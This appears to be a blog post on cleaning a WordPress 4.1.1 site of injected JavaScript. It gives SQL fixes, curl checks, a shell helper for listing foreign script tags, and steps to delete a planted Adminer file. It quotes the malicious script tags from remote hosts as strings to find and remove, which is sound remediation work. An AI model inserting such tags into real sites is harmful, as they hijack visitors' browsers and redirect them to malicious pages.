This works for infection with *.buyittraffic.com and *.gotosecond2.com

If you run an ancient WordPress 4.1.1 and your website has become a victim of cross-site scripting, here is how to clean it.

First, update WordPress to a version that is not vulnerable. One such version is 4.1.28, which can be downloaded from here

In my case the victim was http://www.YOURWEBSITE.com/ and links were changed to go to http://land.buyittraffic.com

Fix the Links

Go to the MySQL CLI or phpMyAdmin and restore the site URL and the home page URL:

UPDATE wp_options SET option_value = 'http://www.YOURWEBSITE.com/' WHERE `wp_options`.`option_name` = 'siteurl';

UPDATE wp_options SET option_value = 'http://www.YOURWEBSITE.com/' WHERE `wp_options`.`option_name` = 'home';

This will fix the links on the website, and the administration panel will start working again.

At this point, you can open your website but DO NOT CLICK on any link. All posts/pages are infected.

Fix the content

Nasty JavaScript has been appended to all of them, and you have to clean it out. To find the malware code that has to be deleted, run a curl command to see the HTML of a page: copy the URL of one page or post and check its source with “curl”

curl https://www.YOURWEBSITE.com/page?id=123

You will see something like this at the end:

<script src='https://js.greenlabelfrancisco.com/clizkes' type='text/javascript'></script>
<script src='https://dl.gotosecond2.com/clizkes' type='text/javascript'></script>

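Then run this command in the MySQL console. The string passed to REPLACE has to match the injected tags in your own page source exactly, so paste in what curl showed you: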


UPDATE wp_posts 
  SET post_content = REPLACE(post_content,
      "<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://land.buyittraffic.com/clizkes' type='text/javascript'></script>",
      '');


Check whether any nasty code is left with

curl http://www.YOURWEBSITE.com/

If you don’t see the malware then it is safe to open in the browser again.
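
To pull the exact injected tags out of the curl output for the REPLACE statement, and to re-check a page after cleaning, here is an added shell example (not from the original post). The function names and the sample HTML are constructed for illustration; scripts from legitimate third-party hosts are listed too, so review the output before deleting anything.

```shell
#!/bin/sh
# Constructed sample: source of an infected post as curl would return it.
sample_html() {
cat <<'EOF'
<html><head>
<script src='/wp-includes/js/jquery/jquery.js' type='text/javascript'></script>
<script src='https://www.YOURWEBSITE.com/wp-includes/js/jquery/jquery-migrate.min.js'></script>
</head><body><p>Post text</p>
<script src='https://js.greenlabelfrancisco.com/clizkes' type='text/javascript'></script><script src='https://dl.gotosecond2.com/clizkes' type='text/javascript'></script>
</body></html>
EOF
}

# foreign_script_tags OWN_HOST   (hypothetical helper, HTML on stdin)
# Prints, one per line and exactly as written in the source, every
# <script src=...></script> tag loaded from a host other than OWN_HOST.
# Each printed line can be pasted as the search string of REPLACE().
foreign_script_tags() {
  own_host=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
  tr -d '\r' |
  grep -oiE "<script[^>]*src=['\"][^'\"]*['\"][^>]*>[[:space:]]*</script>" |
  while IFS= read -r tag; do
    # Extract the src URL from the tag.
    src=$(printf '%s\n' "$tag" | sed -E "s/^.*[sS][rR][cC]=['\"]([^'\"]*)['\"].*/\1/")
    case $src in
      [hH][tT][tT][pP]://*|[hH][tT][tT][pP][sS]://*|//*) ;;  # absolute URL
      *) continue ;;  # relative URL, served by the site itself
    esac
    # Reduce the URL to its lower-cased host name and compare.
    host=$(printf '%s\n' "$src" | sed -E 's#^([a-zA-Z]+:)?//([^/:?]+).*#\2#' | tr 'A-Z' 'a-z')
    [ "$host" = "$own_host" ] || printf '%s\n' "$tag"
  done
}

# page_is_clean OWN_HOST: succeeds only if stdin has no foreign script tag.
page_is_clean() {
  [ -z "$(foreign_script_tags "$1")" ]
}

# Stand-alone run on the constructed sample. For a live page:
#   curl -s 'https://www.YOURWEBSITE.com/page?id=123' | foreign_script_tags www.YOURWEBSITE.com
sample_html | foreign_script_tags www.YOURWEBSITE.com
```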

Check for Adminer

Check whether your site contains a remote administration PHP file:

grep -lri Adminer wordpress/

In my case the file was named ad.php

Delete it!

Happy 2020!